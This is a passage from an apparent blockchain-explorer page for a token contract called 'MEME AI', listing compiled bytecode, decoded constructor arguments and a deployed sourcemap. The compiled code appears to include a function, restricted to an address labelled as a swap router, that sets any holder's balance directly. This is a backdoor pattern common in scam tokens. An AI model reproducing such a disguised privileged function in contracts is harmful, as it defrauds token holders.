b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600061089b8284610b6b565b9392505050565b600060208083528351808285015260005b818110156108cf578581018301518582016040015282016108b3565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461090757600080fd5b919050565b6000806040838503121561091f57600080fd5b610928836108f0565b946020939093013593505050565b60008060006060848603121561094b57600080fd5b610954846108f0565b9250610962602085016108f0565b9150604084013590509250925092565b60006020828403121561098457600080fd5b61089b826108f0565b600080600080600060a086880312156109a557600080fd5b6109ae866108f0565b9450602086013580151581146109c357600080fd5b94979496505050506040830135926060810135926080909101359150565b600080604083850312156109f457600080fd5b6109fd836108f0565b9150610a0b602084016108f0565b90509250929050565b600181811c90821680610a2857607f821691505b602082108103610a4857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115610a9f578160001904821115610a8557610a85610a4e565b80851615610a9257918102915b93841c9390800290610a69565b509250929050565b600082610ab6575060016102dd565b81610ac3575060006102dd565b8160018114610ad95760028114610ae357610aff565b60019150506102dd565b60ff841115610af457610af4610a4e565b50506001821b6102dd565b5060208310610133831016604e8410600b8410161715610b22575081810a6102dd565b610b2c8383610a64565b8060001904821115610b4057610b40610a4e565b029392505050565b600061089b8383610aa7565b80820281158282048414176102dd576102dd610a4e565b808201808211156102dd576102dd610a4e56fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212201e20522eecdaa55dce1f5a502990e9d412533dbd576a43df1e1e5e16921d892064736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000009000000000000000000000000813234074f7a7d726ba083c4668cfaa53a27c1a80000000000000000000000000000000000000000000000000de0b6b3a764000000000000000000000000000000000000000000000000000000000000000000074d454d452041490000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064d454d4541490000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): MEME AI
Arg [1] : symbol_ (string): MEMEAI
Arg [2] : decimals_ (uint8): 9
Arg [3] : JellySwapRouter (address): 0x813234074f7a7D726ba083c4668CFaa53A27C1a8
Arg [4] : totalSupply_ (uint256): 1000000000000000000

-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [3] : 000000000000000000000000813234074f7a7d726ba083c4668cfaa53a27c1a8
Arg [4] : 0000000000000000000000000000000000000000000000000de0b6b3a7640000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [6] : 4d454d4520414900000000000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [8] : 4d454d4541490000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

13982:5112:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14810:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15929:210;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;15929:210:0;1004:187:1;15111:108:0;15199:12;;15111:108;;;1342:25:1;;;1330:2;1315:18;15111:108:0;1196:177:1;16147:454:0;;;;;;:::i;:::-;;:::i;15012:91::-;15086:9;;15012:91;;15086:9;;;;1853:36:1;;1841:2;1826:18;15012:91:0;1711:184:1;15227:180:0;;;;;;:::i;:::-;-1:-1:-1;;;;;15378:21:0;15346:7;15378:21;;;:12;:21;;;;;;;15227:180;5622:94;;;:::i;:::-;;4971:87;5017:7;5044:6;4971:87;;-1:-1:-1;;;;;5044:6:0;;;2237:51:1;;2225:2;2210:18;4971:87:0;2091:203:1;18100:364:0;;;;;;:::i;:::-;;:::i;14909:95::-;;;:::i;15496:216::-;;;;;;:::i;:::-;;:::i;15720:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15886:18:0;;;15854:7;15886:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15720:201;5871:192;;;;;;:::i;:::-;;:::i;14070:35::-;;14104:1;14070:35;;14810:91;14855:13;14888:5;14881:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14810:91;:::o;15929:210::-;16048:4;16070:39;3765:10;16093:7;16102:6;16070:8;:39::i;:::-;-1:-1:-1;16127:4:0;15929:210;;;;;:::o;16147:454::-;16287:4;16304:36;16314:6;16322:9;16333:6;16304:9;:36::i;:::-;16351:220;16374:6;3765:10;16422:138;16478:6;16422:138;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16422:19:0;;;;;;:11;:19;;;;;;;;3765:10;16422:33;;;;;;;;;;:37;:138::i;:::-;16351:8;:220::i;:::-;-1:-1:-1;16589:4:0;16147:454;;;;;:::o;5622:94::-;5017:7;5044:6;-1:-1:-1;;;;;5044:6:0;3765:10;5191:23;5183:68;;;;-1:-1:-1;;;5183:68:0;;3709:2:1;5183:68:0;;;3691:21:1;;;3728:18;;;3721:30;3787:34;3767:18;;;3760:62;3839:18;;5183:68:0;;;;;;;;;5687:21:::1;5705:1;5687:9;:21::i;:::-;5622:94::o:0;18100:364::-;15446:15;;-1:-1:-1;;;;;15446:15:0;3765:10;15446:31;15438:40;;;;;;-1:-1:-1;;;;;18298:21:0;::::1;18290:43;;;::::0;-1:-1:-1;;;18290:43:0;;4070:2:1;18290:43:0::1;::::0;::::1;4052:21:1::0;4109:1;4089:18;;;4082:29;-1:-1:-1;;;4127:18:1;;;4120:39;4176:18;;18290:43:0::1;3868:332:1::0;18290:43:0::1;18376:28;18388:16:::0;18376:8;:28:::1;:::i;:::-;18368:36;::::0;:5;:36:::1;:::i;:::-;-1:-1:-1::0;;;;;18344:21:0;::::1;;::::0;;;:12:::1;:21;::::0;;;;;:60;;;;18420:36;;::::1;::::0;::::1;::::0;18450:5;1342:25:1;;1330:2;1315:18;;1196:177;18420:36:0::1;;;;;;;;18100:364:::0;;;;;:::o;14909:95::-;14956:13;14989:7;14982:14;;;;;:::i;15496:216::-;15618:4;15640:42;3765:10;15664:9;15675:6;15640:9;:42::i;5871:192::-;5017:7;5044:6;-1:-1:-1;;;;;5044:6:0;3765:10;5191:23;5183:68;;;;-1:-1:-1;;;5183:68:0;;3709:2:1;5183:68:0;;;3691:21:1;;;3728:18;;;3721:30;3787:34;3767:18;;;3760:62;3839:18;;5183:68:0;3507:356:1;5183:68:0;-1:-1:-1;;;;;5960:22:0;::::1;5952:73;;;::::0;-1:-1:-1;;;5952:73:0;;6086:2:1;5952:73:0::1;::::0;::::1;6068:21:1::0;6125:2;6105:18;;;6098:30;6164:34;6144:18;;;6137:62;-1:-1:-1;;;6215:18:1;;;6208:36;6261:19;;5952:73:0::1;5884:402:1::0;5952:73:0::1;6036:19;6046:8;6036:9;:19::i;:::-;5871:192:::0;:::o;18472:380::-;-1:-1:-1;;;;;18608:19:0;;18600:68;;;;-1:-1:-1;;;18600:68:0;;6493:2:1;18600:68:0;;;6475:21:1;6532:2;6512:18;;;6505:30;6571:34;6551:18;;;6544:62;-1:-1:-1;;;6622:18:1;;;6615:34;6666:19;;18600:68:0;6291:400:1;18600:68:0;-1:-1:-1;;;;;18687:21:0;;18679:68;;;;-1:-1:-1;;;18679:68:0;;6898:2:1;18679:68:0;;;6880:21:1;6937:2;6917:18;;;6910:30;6976:34;6956:18;;;6949:62;-1:-1:-1;;;7027:18:1;;;7020:32;7069:19;;18679:68:0;6696:398:1;18679:68:0;-1:-1:-1;;;;;18760:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18812:32;;1342:25:1;;;18812:32:0;;1315:18:1;18812:32:0;;;;;;;;18472:380;;;:::o;16609:622::-;-1:-1:-1;;;;;16749:20:0;;16741:70;;;;-1:-1:-1;;;16741:70:0;;7301:2:1;16741:70:0;;;7283:21:1;7340:2;7320:18;;;7313:30;7379:34;7359:18;;;7352:62;-1:-1:-1;;;7430:18:1;;;7423:35;7475:19;;16741:70:0;7099:401:1;16741:70:0;-1:-1:-1;;;;;16830:23:0;;16822:71;;;;-1:-1:-1;;;16822:71:0;;7707:2:1;16822:71:0;;;7689:21:1;7746:2;7726:18;;;7719:30;7785:34;7765:18;;;7758:62;-1:-1:-1;;;7836:18:1;;;7829:33;7879:19;;16822:71:0;7505:399:1;16822:71:0;16989:111;17028:6;16989:111;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16989:20:0;;;;;;:12;:20;;;;;;;:111;:24;:111::i;:::-;-1:-1:-1;;;;;16966:20:0;;;;;;;:12;:20;;;;;;:134;;;;17137:23;;;;;;;:35;;17165:6;17137:27;:35::i;:::-;-1:-1:-1;;;;;17111:23:0;;;;;;;:12;:23;;;;;;;:61;;;;17188:35;;;;;;;;;;17216:6;1342:25:1;;1330:2;1315:18;;1196:177;11336:240:0;11456:7;11517:12;11509:6;;;;11501:29;;;;-1:-1:-1;;;11501:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11552:5:0;;;11336:240::o;6071:173::-;6127:16;6146:6;;-1:-1:-1;;;;;6163:17:0;;;-1:-1:-1;;;;;;6163:17:0;;;;;;6196:40;;6146:6;;;;;;;6196:40;;6127:16;6196:40;6116:128;6071:173;:::o;9057:98::-;9115:7;9142:5;9146:1;9142;:5;:::i;:::-;9135:12;9057:98;-1:-1:-1;;;9057:98:0:o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:186::-;1959:6;2012:2;2000:9;1991:7;1987:23;1983:32;1980:52;;;2028:1;2025;2018:12;1980:52;2051:29;2070:9;2051:29;:::i;2299:553::-;2391:6;2399;2407;2415;2423;2476:3;2464:9;2455:7;2451:23;2447:33;2444:53;;;2493:1;2490;2483:12;2444:53;2516:29;2535:9;2516:29;:::i;:::-;2506:39;;2595:2;2584:9;2580:18;2567:32;2642:5;2635:13;2628:21;2621:5;2618:32;2608:60;;2664:1;2661;2654:12;2608:60;2299:553;;2687:5;;-1:-1:-1;;;;2739:2:1;2724:18;;2711:32;;2790:2;2775:18;;2762:32;;2841:3;2826:19;;;2813:33;;-1:-1:-1;2299:553:1:o;2857:260::-;2925:6;2933;2986:2;2974:9;2965:7;2961:23;2957:32;2954:52;;;3002:1;2999;2992:12;2954:52;3025:29;3044:9;3025:29;:::i;:::-;3015:39;;3073:38;3107:2;3096:9;3092:18;3073:38;:::i;:::-;3063:48;;2857:260;;;;;:::o;3122:380::-;3201:1;3197:12;;;;3244;;;3265:61;;3319:4;3311:6;3307:17;3297:27;;3265:61;3372:2;3364:6;3361:14;3341:18;3338:38;3335:161;;3418:10;3413:3;3409:20;3406:1;3399:31;3453:4;3450:1;3443:15;3481:4;3478:1;3471:15;3335:161;;3122:380;;;:::o;4205:127::-;4266:10;4261:3;4257:20;4254:1;4247:31;4297:4;4294:1;4287:15;4321:4;4318:1;4311:15;4337:422;4426:1;4469:5;4426:1;4483:270;4504:7;4494:8;4491:21;4483:270;;;4563:4;4559:1;4555:6;4551:17;4545:4;4542:27;4539:53;;;4572:18;;:::i;:::-;4622:7;4612:8;4608:22;4605:55;;;4642:16;;;;4605:55;4721:22;;;;4681:15;;;;4483:270;;;4487:3;4337:422;;;;;:::o;4764:806::-;4813:5;4843:8;4833:80;;-1:-1:-1;4884:1:1;4898:5;;4833:80;4932:4;4922:76;;-1:-1:-1;4969:1:1;4983:5;;4922:76;5014:4;5032:1;5027:59;;;;5100:1;5095:130;;;;5007:218;;5027:59;5057:1;5048:10;;5071:5;;;5095:130;5132:3;5122:8;5119:17;5116:43;;;5139:18;;:::i;:::-;-1:-1:-1;;5195:1:1;5181:16;;5210:5;;5007:218;;5309:2;5299:8;5296:16;5290:3;5284:4;5281:13;5277:36;5271:2;5261:8;5258:16;5253:2;5247:4;5244:12;5240:35;5237:77;5234:159;;;-1:-1:-1;5346:19:1;;;5378:5;;5234:159;5425:34;5450:8;5444:4;5425:34;:::i;:::-;5495:6;5491:1;5487:6;5483:19;5474:7;5471:32;5468:58;;;5506:18;;:::i;:::-;5544:20;;4764:806;-1:-1:-1;;;4764:806:1:o;5575:131::-;5635:5;5664:36;5691:8;5685:4;5664:36;:::i;5711:168::-;5784:9;;;5815;;5832:15;;;5826:22;;5812:37;5802:71;;5853:18;;:::i;7909:125::-;7974:9;;;7995:10;;;7992:36;;;8008:18;;:::i

Swarm Source

ipfs://1e20522eecdaa55dce1f5a502990e9d412533dbd576a43df1e1e5e16921d8920
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.